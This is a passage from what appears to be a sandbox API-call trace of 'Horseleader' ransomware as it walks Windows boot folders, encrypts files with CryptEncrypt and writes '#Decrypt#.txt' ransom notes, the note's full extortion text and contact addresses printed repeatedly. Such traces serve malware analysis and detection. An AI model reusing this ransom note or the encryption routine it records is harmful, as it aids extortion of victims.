\r\ntell your unique ID\r\n") returned 1508 [0121.883] WriteFile (in: hFile=0x150, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.884] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0121.884] WriteFile (in: hFile=0x150, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.885] CloseHandle (hObject=0x150) returned 1 [0121.885] 
GetProcessHeap () returned 0x780000 [0121.885] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.885] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0121.885] lstrcmpiW (lpString1="ko-KR", lpString2="Windows") returned -1 [0121.886] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR") returned 17 [0121.886] lstrcmpW (lpString1="ko-KR", lpString2=".") returned 1 [0121.886] lstrcmpW (lpString1="ko-KR", lpString2="..") returned 1 [0121.886] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\ko-KR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.886] GetProcessHeap () returned 0x780000 [0121.886] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.886] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\*") returned 19 [0121.886] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.939] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 
[0121.939] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\.") returned 19 [0121.939] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.939] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.940] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.940] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\..") returned 20 [0121.940] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.940] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.940] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.941] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.941] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 33 [0121.941] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.941] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 
[0121.941] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.941] lstrlenW (lpString=".testttjffg") returned 11 [0121.941] StrStrW (lpFirst="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.941] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.942] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.942] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.942] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.942] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.943] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\#Decrypt#.txt") returned 31 [0121.943] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\#Decrypt#.txt" (normalized: "c:\\boot\\ko-kr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0121.944] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite 
to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0121.944] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.945] lstrlenA (lpString="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") returned 1368 [0121.945] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.946] CloseHandle (hObject=0x1dc) returned 1 [0121.946] GetProcessHeap () returned 0x780000 [0121.946] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.946] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0121.947] lstrcmpiW (lpString1="memtest.exe", lpString2="Windows") returned -1 [0121.947] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\memtest.exe") returned 23 [0121.947] StrStrIW (lpFirst="memtest.exe", lpSrch=".horseleader") returned 0x0 [0121.947] lstrcmpW (lpString1="memtest.exe", lpString2="#Decrypt#.txt") returned 1 [0121.947] lstrcmpW (lpString1="memtest.exe", lpString2="_uninstalling_.png") returned 1 [0121.947] lstrlenW (lpString=".testttjffg") returned 11 [0121.947] StrStrW (lpFirst="\\\\?\\C:\\Boot\\memtest.exe", lpSrch=".testttjffg") returned 0x0 [0121.947] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0121.948] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0121.948] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.948] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0121.948] lstrcmpiW (lpString1="nb-NO", lpString2="Windows") returned -1 [0121.948] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO") returned 17 [0121.949] lstrcmpW (lpString1="nb-NO", lpString2=".") returned 1 [0121.949] lstrcmpW (lpString1="nb-NO", lpString2="..") returned 1 [0121.949] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\nb-NO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.949] GetProcessHeap () returned 0x780000 [0121.949] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.949] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\*") returned 19 [0121.949] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, 
ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.950] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.950] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\.") returned 19 [0121.950] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.950] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.950] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.951] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\..") returned 20 [0121.951] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.951] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.951] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", 
cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.951] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.951] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 33 [0121.951] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.951] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.951] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.951] lstrlenW (lpString=".testttjffg") returned 11 [0121.952] StrStrW (lpFirst="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.952] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0122.205] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0122.205] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0124.488] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0124.488] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0124.489] wnsprintfW (in: pszDest=0x7c8598, 
cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\#Decrypt#.txt") returned 31 [0124.489] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\#Decrypt#.txt" (normalized: "c:\\boot\\nb-no\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0124.734] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0124.734] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0124.736] lstrlenA (lpString="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") returned 1368 [0124.737] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0124.737] CloseHandle (hObject=0x1dc) returned 1 [0124.738] GetProcessHeap () returned 0x780000 [0124.739] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0124.739] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0124.739] lstrcmpiW (lpString1="nl-NL", lpString2="Windows") returned -1 [0124.739] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL") returned 17 [0124.739] lstrcmpW (lpString1="nl-NL", lpString2=".") returned 1 [0124.739] lstrcmpW (lpString1="nl-NL", lpString2="..") returned 1 [0124.740] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\nl-NL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0124.740] GetProcessHeap () returned 0x780000 [0124.740] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0124.740] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\*") returned 19 [0124.740] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0124.741] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0124.741] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\.") returned 19 [0124.741] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0124.741] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0124.742] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0124.742] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\..") returned 20 [0124.742] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0124.742] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0124.742] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, 
ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0124.742] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0124.742] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 33 [0124.743] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0124.743] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0124.743] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0124.743] lstrlenW (lpString=".testttjffg") returned 11 [0124.743] StrStrW (lpFirst="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0124.743] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0124.744] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0124.744] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0124.744] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, 